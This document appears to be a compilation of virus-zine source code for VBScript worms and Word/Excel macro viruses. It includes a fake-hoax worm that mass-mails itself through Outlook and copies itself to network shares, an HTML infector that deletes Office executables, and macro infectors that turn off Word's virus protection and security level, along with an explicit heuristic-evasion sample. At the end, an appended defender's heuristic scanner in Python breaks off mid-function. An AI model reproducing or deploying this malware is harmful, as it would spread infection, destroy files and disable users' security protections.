&O&" Set MAPI = Outlook.GetNameSpace(""MAPI"")" &O&" For Each List In MAPI.AddressLists" &O&" If List.AddressEntries.Count > 0 Then" &O&" Set Email1 = Outlook.CreateItem(0)" &O&" If List.AddressEntries.Count > MaxAmou nt Then" &O&" Dim Address()" &O&" ReDim Address(MaxAmount - 1)" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" Address(Counter1) = Int(List.AddressEntries.Count * Rnd)" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" For Counter2 = Counter1 + 1 To Max Amount - 1" &O&" If Address(Counter1) = Address(C ounter2) And Address(Counter1) <> -1 Then

Address(Counter2) = -1" &O&" Next" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" If Address(Counter1) = -1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" For Counter2 = Counter1 + 1 To MaxAmount - 1" &O&" If Address(Counter1) = Address(C ounter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1 " &O&" Next" &O&" Next" &O&" For Counter1 = 0 To MaxAmount - 1" &O&" If Address(Counter1) <> -1 Then" &O&" Set Entry = List.AddressEntries(Address(Counter1))" &O&" If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address" &O&" Set Entry = Nothing" &O&" End If" &O&" Next" &O&" Else" &O&" For Counter1 = 1 To List.AddressEntr ies.Count" &O&" Set Entry = List.AddressEntries(Counter1)" &O&" If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address" &O&" Set Entry = Nothing" &O&" Next" &O&" End If" &O&" Email1.BCC = Addresses" &O&" Email1.Subject = Subject" &O&" Email1.Body = Body" &O&" Email1.Attachments.Add AttachmentFile" &O&" Email1.DeleteAfterSubmit = True" &O&" Email1.Send" &O&" Set Email1 = Nothing" &O&" Randomize" &O&" If Int(5 * Rnd) = 0 Then" &O&" Set Email2 = Outlook.CreateItem(0)" &O&" Email2.BCC = Addresses" &O&" Email2.Subject = ""Alma""" &O&" Email2.Body = ""No alucines que te a mo,"" & Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & "" mi coraz"" & Chr(243) & ""n no manda en mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(23 7) & "" lo hiciera,"" & Chr(13) & Chr(10) & ""mi alma estar"" & Chr(237) & ""a perdida.""" &O&" Email2.DeleteAfterSubmit = True" &O&" Email2.Send" &O&" Set Email2 = Nothing" &O&" End If" &O&" End If" &O&" Next" &O&" Set MAPI = Nothing" &O&" Set Outlook = Nothing" &O&" End If" &O&" End Sub" &O&" Sub 
ShowText(Content)" &O&" On Error Resume Next" &O&" Set FSO = CreateObject(""Scripting.FileSyste mObject"")" &O&" Set File = FSO.CreateTextFile(TextFile, True )" &O&" File.Write(Content)" &O&" File.Close" &O&" Set File = Nothing" &O&" Set FSO = Nothing" &O&" Set WSHShell = CreateObject(""WScript.Shell"")" &O&" WSHShell.Run(TextFile)" &O&" Set WSHShell = Nothing" &O&" End Sub" &O&" ]]>" &O&" </script>" &O&"</component>" &OS.CloseSet F=GetObject( "script:" &G.BuildPath(G.GetSpecialFolder( 2),A))F.AttachmentFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT.VBE")F.TextFile=G.BuildPath(G.GetSpecialFolder( 2), "WOBBLER.TXT")F.WormFile=WScript.ScriptFullNameF.ShowText "Thought you might be interested in this message. I f you receive an" &O&"email with a file called ""California"" do not open the f ile. The file" &O&"contains the ""WOBBLER"" virus." &O&O&"This information was announced yesterday morning b y IBM. The statement" &O&"says that ... ""This is a very dangerous virus, mu ch worse than" &O&"'Melissa' and there is NO remedy for it at this time. Some ve ry sick" &O&"individual has succeeded in using the reformat function from Norton" &O&"Utilities causing it to completely erase all documents on the hard" &O&"drive. It has been designed to work with Netscape Navigator and" &O&"Microsoft Internet Explorer. It destroys Macintosh and IBM compatible" &O&"computers. This is a new, very malicious virus and not many people" &O&"know about it at this time.""" &O&"""Please pass this warning file to everyone in you r address book and" &O&"share it with all your online friends ASAP so that the destruction it " &O&"can cause may be minimized.""" &OF.OutlookSpreading 100 , "Fw: important" , "> Thought you might be interested in this message, read the attachment for more information."F.NetworkSpreading "WOBBLER.TXT.VBE"F.DelTempFilesG.DeleteFile G.BuildPath(G.GetSpecialFolder( 2),A), True

' Here is the WSC file (the COM object), I used spaces and "normal" variable names to make it
' easier to read:

<?XML version= "1.0" ?><component>

<comment>NETWORK/OUTLOOK.FakeHoax

</comment><public >

<property name="AttachmentFile" /><property name="TextFile" /><property name="WormFile" /><method name= "DelTempFiles" /><method name= "NetworkSpreading" >

<parameter name= "FileName" /></method><method name= "OutlookSpreading" >

<parameter name= "Body" /><parameter name= "MaxAmount" /><parameter name= "Subject" />

</method><method name= "ShowText" >

<parameter name= "Content" /></method>

</ public ><script language= "VBScript" >

<![CDATA[Sub DelTempFiles

On Error Resume NextSet FSO = CreateObject( "Scripting.FileSystemObject" )If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, TrueIf FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, TrueSet FSO = Nothing

End SubSub NetworkSpreading(FileName)

On Error Resume NextSet Network = CreateObject( "WScript.Network" )Set Shares = Network.EnumNetworkDrivesIf Shares.Count > 0 Then

Set FSO = CreateObject( "Scripting.FileSystemObject" )For Counter1 = 0 To Shares.Count - 1

If Shares.Item(Counter1) <> "" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)

NextSet FSO = Nothing

End IfSet Shares = NothingSet Network = Nothing

End SubSub OutlookSpreading(MaxAmount, Subject, Body)

On Error Resume NextSet FSO = CreateObject( "Scripting.FileSystemObject" )FSO.CopyFile WormFile, AttachmentFileSet FSO = NothingOutlook = ""Set Outlook = CreateObject( "Outlook.Application" )If Outlook <> "" Then

Set MAPI = Outlook.GetNameSpace( "MAPI" )For Each List In MAPI.AddressLists

If List.AddressEntries.Count > 0 ThenSet Email1 = Outlook.CreateItem( 0)If List.AddressEntries.Count > MaxAmount Then

Dim Address()ReDim Address(MaxAmount - 1)For Counter1 = 0 To MaxAmount - 1

Address(Counter1) = Int(List.AddressEntries.Count * Rnd )NextFor Counter1 = 0 To MaxAmount - 1

For Counter2 = Counter1 + 1 To MaxAmount - 1If Address(Counter1) = Address(Counter2) And Address(Counter1) <> - 1 Then

Address(Counter2) = - 1Next

NextFor Counter1 = 0 To MaxAmount - 1

If Address(Counter1) = - 1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)

NextFor Counter1 = 0 To MaxAmount - 1

For Counter2 = Counter1 + 1 To MaxAmount - 1If Address(Counter1) = Address(Counter2) And Address(Counter1) <> - 1 Then

Address(Counter2) = - 1Next

NextFor Counter1 = 0 To MaxAmount - 1

If Address(Counter1) <> - 1 ThenSet Entry = List.AddressEntries(Address(Counter1))If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses &

"; " & Entry.AddressSet Entry = Nothing

End IfNext

ElseFor Counter1 = 1 To List.AddressEntries.Count

Set Entry = List.AddressEntries(Counter1)If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses &

"; " & Entry.AddressSet Entry = Nothing

NextEnd IfEmail1.BCC = AddressesEmail1.Subject = SubjectEmail1.Body = BodyEmail1.Attachments.Add AttachmentFileEmail1.DeleteAfterSubmit = TrueEmail1.SendSet Email1 = NothingRandomizeIf Int( 5 * Rnd) = 0 Then

Set Email2 = Outlook.CreateItem( 0)Email2.BCC = AddressesEmail2.Subject = "Alma"Email2.Body = "No alucines que te amo," & Chr( 13) & Chr( 10) & "cuando en

realidad es solo" & Chr( 13) & Chr( 10) & "mi coraz" & Chr( 243 ) & "n qui" & Chr( 233 ) & "n lo hace." & Chr( 13) & Chr( 10) & "Porque como ya sabr" & Chr( 225 ) & "s," & Chr( 13) & Chr( 10) &"mi coraz" & Chr( 243 ) & "n no manda en mi vida," & Chr( 13) & Chr( 10) & "si as" & Chr( 237 ) &" lo hiciera," & Chr( 13) & Chr( 10) & "mi alma estar" & Chr( 237 ) & "a perdida."

Email2.DeleteAfterSubmit = TrueEmail2.SendSet Email2 = Nothing

End IfEnd If

NextSet MAPI = NothingSet Outlook = Nothing

End IfEnd SubSub ShowText(Content)

On Error Resume NextSet FSO = CreateObject( "Scripting.FileSystemObject" )Set File = FSO.CreateTextFile(TextFile, True )File.Write(Content)File.CloseSet File = Nothing

Set FSO = NothingSet WSHShell = CreateObject( "WScript.Shell" )WSHShell.Run(TextFile)Set WSHShell = Nothing

End Sub]]>

</script></component>

VERSION 1.0 CLASSBEGIN

MultiUse = - 1 'TrueENDAttribute VB_Name = "ThisDocument"Attribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TruePrivate Function IT()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabledSet A = VBE.SelectedVBComponent.CodeModuleB = A.Lines(A.ProcStartLine( "IT" , vbext_pk_Proc), A.ProcCountLines( "IT" , vbext_pk_Proc))For c = 1 To VBE.VBProjects.CountFor D = 1 To VBE.VBProjects(c).VBComponents.CountSet E = VBE.VBProjects(c).VBComponents(D).CodeModuleIf E.ProcOfLine(E.ProcStartLine( "IT" , vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 ThenE.AddFromString BFor F = 1 To E.CountOfLinesG = E.ProcOfLine(F, 1)If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT"

ThenE.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lin es(E.ProcStartLine(G, vbext_pk_Proc), 1) & ": IT"H = GEnd IfNextNextNextEnd FunctionPrivate Sub Document_Open(): IT'My_Creator = Lys Kovick'My_Name = Neclovek'My_Comments = Do Not Distribute!End Sub

VERSION 1.0 CLASSBEGIN

MultiUse = - 1 'TrueENDAttribute VB_Name = "ThisDocument"Attribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TruePrivate Function IT()On Error Resume NextApplication.EnableCancelKey = wdCancelDisabledSet A = VBE.SelectedVBComponent.CodeModuleB = A.Lines(A.ProcStartLine( "IT" , vbext_pk_Proc), A.ProcCountLines( "IT" , vbext_pk_Proc))For c = 1 To VBE.VBProjects.CountFor D = 1 To VBE.VBProjects(c).VBComponents.CountSet E = VBE.VBProjects(c).VBComponents(D).CodeModuleF = ""F = E.Lines(E.ProcStartLine( "IT" , vbext_pk_Proc), E.ProcCountLines( "IT" , vbext_pk_Proc))If E.CountOfLines > 2 And F <> B Then E.AddFromString BFor G = 1 To E.CountOfLinesH = E.ProcOfLine(G, 1)If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT"

ThenE.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lin es(E.ProcStartLine(H, vbext_pk_Proc), 1) & ": IT"I = HEnd IfNextNextNextEnd FunctionPrivate Sub Document_Open(): IT'My_Creator = Lys Kovick'My_Name = Unperson'My_Comments = Do Not Distribute!End Sub

<SCRIPT LANGUAGE="VBScript" ><!--

Dim FSO,MSBound,DC,D,TMP,FMSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$ Dim FSO,MSBoun d,DC,D,TMP,F$ MSBound =

#|#$ On Error Resume Next$ TMP = ReplaceWithIn(Ch r(36),vbCrLf,MSBound)$ TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)$ F = InStr(1,TM P,Chr(124))$ MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)$ F = InStr(2500,MSBound,Chr (124))$ MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)$$ Set FSO = CreateObject(#Scripti ng.FileSystemObject#)$ If Err.Number = 0 Then$ Set DC = FSO.Drives$ For Each D I n DC$ If D.DriveType = 2 Then$ SweepDrive D.DriveLetter & #:\#$ End If$ Next$ End If$$Sub SweepDrive(pPath)$ Dim F, S, O$ On Error Resume N ext$ Set F = FSO.GetFolder(pPath)$ InfectFiles F$ Set S = F.SubFolders$ For Each O I n S$ SweepDrive(pPath & O.Name & #\#)$ Next $End Sub $$Sub InfectFiles(pFold er)$ Dim F,Member,Ext,M,C$ On Error Resume Next$ Set F = pFolder.Files$ For Each Memb er In F$ M = UCase(Member.Name)$ If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M = #WORD.EXE# Then$ Set M = FSO.GetFile(Member .Path)$ M.Attributes = (M.Attributes And 1) - 1$ M.Delete$ En d If $ Ext = UCase(FSO.GetExtensionName(Member.Name))$ If E xt = #HTML# Or Ext = #HTM# Then$ Set M = FSO.OpenTextFile(Member.Path,1)$ C = M.ReadAll$ If InStr(1,C,MSBound) = 0 Then$ Set M = FSO .CreateTextFile(Member.Path, True)$ M.WriteLine MSBound & C$ M.Close$ End If$ End if$ Next$End Sub$$Private Function ReplaceWithIn(CurCha r,NewChar,SourceString)$ Dim T,TMP$ T = 1$ TMP = SourceString$ Do While T > 0$ T = In Str(T, TMP, CurChar)$ If T > 0 Then TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$ Loop $ ReplaceWithIn = TMP$End Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"

On Error Resume NextTMP = ReplaceWithIn(Chr( 36),vbCrLf,MSBound)TMP = ReplaceWithIn(Chr( 35),Chr( 34),TMP)F = InStr( 1,TMP,Chr( 124 ))MSBound = Left(TMP,F- 1) & MSBound & Mid (TMP,F+ 1)F = InStr( 2500 ,MSBound,Chr( 124 ))MSBound = Left(MSBound,F- 1) & Mid (MSBound,F+ 1)

Set FSO = CreateObject( "Scripting.FileSystemObject" )If Err.Number = 0 Then

Set DC = FSO.DrivesFor Each D In DC

If D.DriveType = 2 ThenSweepDrive D.DriveLetter & ":\"

End IfNext

End If

Sub SweepDrive(pPath)Dim F, S, OOn Error Resume NextSet F = FSO.GetFolder(pPath)InfectFiles FSet S = F.SubFoldersFor Each O In S

SweepDrive(pPath & O.Name & "\" )Next

End Sub

Sub InfectFiles(pFolder)Dim F,Member,Ext,M,COn Error Resume NextSet F = pFolder.FilesFor Each Member In F

M = UCase(Member.Name)If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then

Set M = FSO.GetFile(Member.Path)M.Attributes = (M.Attributes And 1) - 1

M.DeleteEnd IfExt = UCase(FSO.GetExtensionName(Member.Name))If Ext = "HTML" Or Ext = "HTM" Then

Set M = FSO.OpenTextFile(Member.Path, 1)C = M.ReadAllIf InStr( 1,C,MSBound) = 0 Then

Set M = FSO.CreateTextFile(Member.Path, True )M.WriteLine MSBound & CM.Close

End IfEnd if

NextEnd Sub

Private Function ReplaceWithIn(CurChar,NewChar,SourceString)Dim T,TMPT = 1TMP = SourceStringDo While T > 0

T = InStr(T, TMP, CurChar)If T > 0 Then TMP = Left(TMP,T- 1) & NewChar & Mid (TMP,T+ 1)

LoopReplaceWithIn = TMP

End Function

'MSBound by Suppa. --></SCRIPT>

<HTML><HEAD><TITLE>MSBound</TITLE></HEAD><BODY BGCOLOR="#000000" ><BR><BR><BR><CENTER><TABLE BORDER=0 BGCOLOR="#000000" CELLPADDING=10><TR><TD><FONT COLOR="#FF0000" ><U><B><FONT COLOR="#FF0000" > MSBound by Suppa.</B></U><BR><BR><BR>This is the parent HTML file containing MSBound written by Suppa.<B R>Feel free do to what you want with it, but don 't blame me if it comes back to you.<BR><BR>Special thanks go out to Gigabyte for getting me interested in these things.<BR></FONT></TD></TR></TABLE></CENTER></BODY></HTML>

VERSION 1.0 CLASSBEGIN

MultiUse = - 1 'TrueENDAttribute VB_Name = "ThisDocument"Attribute VB_GlobalNameSpace = FalseAttribute VB_Creatable = FalseAttribute VB_PredeclaredId = TrueAttribute VB_Exposed = TruePrivate Declare Function SetSysColors Lib "user32" ( ByVal nChanges As Long , lpSysColor AsLong , lpColorValues As Long ) As LongPrivate Sub Document_Open()' LSD' By The WalruS 09/00 v1.00

On Error Resume Next

Randomize

If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub

Select Case Application.Version

Case "9.0"System.PrivateProfileString( "" ,

"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security" , "Level" ) = 1&CommandBars( "Macro" ).Controls( "Security..." ).Enabled = False

Case "8.0"Options.VirusProtection = FalseOptions.SaveNormalPrompt = FalseOptions.ConfirmConversions = False

End Select

With Application.ScreenUpdating = False.DisplayStatusBar = False.DisplayAlerts = False

End With

KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKey F11), KeyCategory:= 0, Command:= " "

Set nor = NormalTemplate.VBProject.vbcomponents( 1).CodeModuleSet doc = ActiveDocument.VBProject.vbcomponents( 1).CodeModule

ChangeHook = Int(Rnd * 2)Select Case ChangeHook

Case 0Hook = "Private Sub Document_Open()"

Case 1Hook = "Private Sub Document_Close()"

End Select

Open "C:\Windows\" & Day(Now) & ".sys" For Output As #1Print #1, "Private Declare Function SetSysColors Lib ""user32 "" (ByVal nChanges As Long,

lpSysColor As Long, lpColorValues As Long) As Long"Print #1, HookPrint #1, VBProject.vbcomponents( 1).CodeModule.Lines( 3, 110 )Close #1

If nor.Lines( 3, 1) <> "' LSD" Thennor.DeleteLines 1, nor.CountOfLinesnor.AddFromFile ( "C:\Windows\" & Day(Now) & ".sys" )NormalTemplate.Save

ElseIf doc.Lines( 3, 1) <> "' LSD" Thendoc.DeleteLines 1, doc.CountOfLinesdoc.AddFromFile ( "C:\Windows\" & Day(Now) & ".sys" )

End If

With Dialogs(wdDialogFileSummaryInfo).Author = "WalruS".Title = "CandyFlippin".Execute

End With

TimeCheck = Second(Now)One = Left(TimeCheck, 1)Two = Right(TimeCheck, 1)If One = Two Then Call CandyFlip

NormalTemplate.Saved = TrueIf ActiveDocument.Saved <> True Then ActiveDocument.Save

End Sub

Private Sub CandyFlip()On Error Resume Nexta = SetSysColors( 1, 1, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 2, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 3, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 4, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 5, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 6, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 7, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 8, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 9, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 10, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 11, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 12, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 13, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 14, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 15, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 16, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 17, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 18, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 19, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 20, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 21, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 22, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 23, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 24, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 25, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 26, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))a = SetSysColors( 1, 27, RGB(Rnd * 255 , Rnd * 255 , Rnd * 255 ))

End Sub

'AidaPrivate Sub Document_Open(): With Options: Const nula = 0.VirusProtection = nulaEnd With : Dim a, b, c, da = Strings.RTrim(ThisDocument.VBProject.VBComponents ( 1).CodeModule.Lines( 1, _ThisDocument.VBProject.VBComponents( 1).CodeModule.CountOfLines))With NormalTemplate.VBProject.VBComponents( 1).CodeModulec = .Lines( 1, 1)If c <> "'Aida" Then.DeleteLines 1, NormalTemplate.VBProject.VBComponents( 1) _.CodeModule.CountOfLines.InsertLines 1, aEnd IfEnd WithWith ActiveDocument.VBProject.VBComponents( 1).CodeModuled = .Lines( 1, 1)If d <> "'Aida" Then.DeleteLines 1, ActiveDocument.VBProject.VBComponents( 1) _.CodeModule.CountOfLines.InsertLines 1, aEnd If : End WithIf Day(Now()) = 14 And Month(Now()) = 9 ThenWith Selection.Font.Bold = True : .Font.Color = wdColorViolet.Font.Size = 26: .Font.Emboss = True.Font.Animation = wdAnimationSparkleText.Font.Shadow = True : .ParagraphFormat.Alignment = wdAlignParagraphCenterSelection.Text = "Aida: Where ever You are, You are only one that I loved truely!"End WithEnd If'WM97/2K.Aida by e[ax]'Pozdravljam sve pri BiHNet.Org-u!'Greetz to all ppl on #virus and VX-scene!'"Kad sve izgleda da umire, ono se ustvari radja" - e[ax]End Sub

'e[ax]Private Sub Document_open()Dim KVICKJS, CHSJEUR, LCXJSIE, OCKAJRF, SIFDMXUSet CHSJEUR = ThisDocument.VBProject.VBComponents( 1).CodeModuleSet OCKAJRF = NormalTemplate.VBProject.VBComponents( 1).CodeModuleSet LCXJSIE = ActiveDocument.VBProject.VBComponents( 1).CodeModuleKVICKJS = Strings.Trim(CHSJEUR.lines( 1, CHSJEUR.countoflines))SIFDMXU = Strings.LCase( "'e[ax]" )If SIFDMXU <> OCKAJRF.lines( 1, 1) ThenWith OCKAJRF.deletelines 1, OCKAJRF.countoflines.insertlines 1, KVICKJSEnd WithEnd IfIf SIFDMXU <> LCXJSIE.lines( 1, 1) ThenWith LCXJSIE.deletelines 1, LCXJSIE.countoflines.insertlines 1, KVICKJSEnd WithEnd If'WM97/2K.String by e[ax]'SIM v1.0 [String Infection Method] by e[ax]'Greetz: k04x, rudeboy, BIGFOOOT, E-man, SnakeLord, t[r]ax'H4dija, te ostale pri BIHnet.ORG-u'SP.greetz to: Jackie 2Fl0wer, KnowDeth, ASMhead5, Mist, mort-'nala, Giga, LifeWire, Fulvian, Staggle, SlageHamm, Perikles, Evul, and to all ppl on #virus'10x once again for inspiration...'VicES: Where ar u man!?End Sub

Private Sub document_open(): Const nula = 0Dim a, b, c, d: Set b = ThisDocument: Options.VirusProtection = nulaIf b = ActiveDocument Then Set c = NormalTemplate Else Set c = ActiveDocumentd = b.VBProject.vbcomponents( 1).codemodule.lines( 1, _b.VBProject.vbcomponents( 1).codemodule.countoflines): a = Strings.LCase(d)With c.VBProject.vbcomponents( 1).codemodule

If .lines( 14, 1) <> "'string2" ThenWith c.VBProject.vbcomponents( 1).codemodule

.deletelines 1, c.VBProject.vbcomponents( 1).codemodule.countoflines

.insertlines 1, aEnd With

End IfEnd WithEnd Sub'string2

VERSION 1.0 CLASSBEGIN

MultiUse = - 1 'TrueENDAttribute VB_Name = "Blade"Attribute VB_GlobalNameSpace = FalseAttribute VB_Creatable = FalseAttribute VB_PredeclaredId = FalseAttribute VB_Exposed = FalsePrivate Sub Document_Close()On Error Resume Next'Class.Blade'code by Necronomikon'greetz to:Gigabyte,jackie,SnakeByte,Lys Kovick,SerialKiller,Perikles,-KD-,SnakeMan,SlageHam mer,dageshi,Ratter,#virus,#shadowvx,[6oCKeR],Fii7e,LISPApplication.DisplayAlerts = wdAlertsNoneApplication.EnableCancelKey = wdCancelDisabledApplication.DisplayStatusBar = FalseOptions.ConfirmConversions = FalseOptions.VirusProtection = FalseCommandBars( "Macro" ).Controls( "Security..." ).Enabled = FalseSystem.PrivateProfileString( "" ,"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Wo rd\Security" , "Level" ) = 1&Options.SaveNormalPrompt = FalseOptions.BlueScreen = True : Application.WindowState = wdWindowStateMaximizeCommandBars( "Tools" ).Controls( "Macro" ).Enabled = ( 99 - 99): CommandBars( "File" ).Controls("Print Preview" ).Enabled = ( 99 - 99): CommandBars( "Edit" ).Controls( "Select All" ).Enabled = (99 - 99)CommandBars( "Edit" ).Controls( "Undo VBA-Selection.TypeText" ).Enabled = ( 99 - 99):CommandBars( "Tools" ).Controls( "Word Count..." ).Enabled = ( 99 - 99):CommandBars( "Tools" ).Controls( "Options..." ).Enabled = ( 99 - 99)For Each Target In Application.VBE.VBProjectsIf Target.VBComponents( 1).CodeModule.Lines( 1, 1) = "" Then Target.VBComponents( 1).CodeModule.addfromstring, ThisDocument.VBProject.VBC omponents( 1).CodeModule.Lines( 1, 26)NextFor i = 1 To Documents.CountIf Documents(i).Saved = False Then Documents(i).SaveAs Documents(i).FullNameNextSystem.PrivateProfileString( "" , "HKEY_CURRENT_USER\ControlPanel\Desktop" , "MenuShowDelay" ) ="10000"End Sub

Private Sub Document_Open()y = y + 1Set a = Word.Application.ApplicationSet j = a.MacroContainerSet k = j.VBProject.vbcomponents(y)Set c = k.codemoduleIf j = a.NormalTemplate Then Set i = a.ActiveDocument Else Set i = a.NormalTemplateSet e = i.VBProjecta.Options.VirusProtection = vbEmptya.Options.SaveNormalPrompt = vbEmptyWith e.vbcomponents(y).codemoduleIf Not .lines( 16, y) Like "'L*m*" Then .deletelines y, .countoflines: .insertlines y, c.lines(y, 19)End WithIf InStr(y, VBA.Time, "5" ) Then MsgBox "I'm so happy 'cause today I found my friends, they are in my head." & vbCrLf & "I'm so ugly, thats ok 'cause so are you. Broken mi rrors." &vbCrLf & "Sunday morning is every day for all I care and I'm not scared." & vbCrLf & "Light my candles in a days 'cause I forgot..." , vbInformation, "Lithium"End Sub'Lithium / (c) 1999 jackie'(Prove sample of Anti-Bloodhound code)'No backdrops and no lights can focus'on that shit...Linezer0 Oldskewl Tribe

' ---[snip]---

' Hi there kids, this some very old werk to show you how to code anti-
' bloodhound-heuristically. Well, it's just a basic example to prove
' that it's possible to bypass that heuristic. xD Just check it out and
' enjoy!

' Whatever tomorrow brings,
' jackie

'firealPrivate Sub Workbook_Open()On Error Resume NextFor Each fireal In ThisWorkbook.VBProject.VBComponentsIf fireal.Properties.Count = 73 Then ourcode = fireal.codemodule.Lines( 1, 20)NextFor Each book In WorkbooksFor Each fireal In book.VBProject.VBComponentsIf fireal.Properties.Count = 73 And fireal.codemodule.Lines( 1, 1) <> "'fireal" Thenfireal.codemodule.deletelines 1, fireal.codemodule.countoflinesfireal.codemodule.insertlines 1, ourcodeIf book.Path = "" Then book.SaveAs book.FullName Else book.SaveEnd IfNextNextEnd Sub'x97m.fireal (c) 1999 jackie'1st language independent excel class infector'No backdrops and no lights can focus on that shit. ..Linezer0 '1999

' ---[snip]---

' Hi there kids, same as Lithium, I just can present you some old werk
' because of that damn zip disk crash. Hope you can enjoy this language
' independent x97m. Catch y'all around.

' Do you know how I feel,
' jackie
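A defender's counterpart to the macro samples above, added here and not part of the zine or of any author's code: the WM97 and X97M listings all reach for the same handful of Office objects (the document's own VBProject, the CodeModule of the Normal template or active document, InsertLines/DeleteLines/AddFromString, Options.VirusProtection, the Security registry value written through PrivateProfileString, and CommandBars items being disabled). A scanner that flags those indicators in a module's source text, with line numbers, is the kind of heuristic the "Anti-Bloodhound" comment is aimed at. The indicator list and the verdict rule below are my own assumptions, not any vendor's rule set, and both VBA snippets are constructed for the test; the suspect one is an indicator-bearing fragment, not a working macro.

```python
"""Heuristic scan of VBA module source for macro self-replication indicators.

Added example, not from the zine. The indicator list and the verdict rule
are assumptions for illustration, not any scanner vendor's rule set.
"""
import re

# (indicator name, pattern). VBA identifiers are case-insensitive, hence re.I.
INDICATORS = [
    # entry point that runs without the user doing anything
    ("auto_macro", re.compile(
        r"\bSub\s+(Document_Open|Document_Close|Workbook_Open|AutoOpen|AutoClose|AutoExec)\b", re.I)),
    # reaching into the VBA project object model (needed to read or write macros)
    ("vbproject_access", re.compile(r"\bVBProject\b", re.I)),
    # reading macro source back out of a module
    ("codemodule_read", re.compile(r"\.Lines\s*\(", re.I)),
    # writing macro source into a module (the copy step)
    ("codemodule_write", re.compile(r"\.(InsertLines|AddFromString|DeleteLines)\b", re.I)),
    # switching off the built-in macro warning
    ("virusprotection_off", re.compile(r"Options\.VirusProtection\s*=", re.I)),
    # lowering the macro security level through the registry
    ("security_reg_write", re.compile(r"PrivateProfileString\s*\(.*Security", re.I)),
    # greying out menu items the user would use to inspect macros
    ("ui_disable", re.compile(r"CommandBars\s*\(.*\)\s*\.Enabled\s*=", re.I)),
]

# Indicators that together amount to "copies macro code somewhere else on its own".
REPLICATION_CORE = {"auto_macro", "vbproject_access", "codemodule_write"}


def scan_module(source: str) -> tuple[dict[str, list[int]], bool]:
    """Return (hits, replicating).

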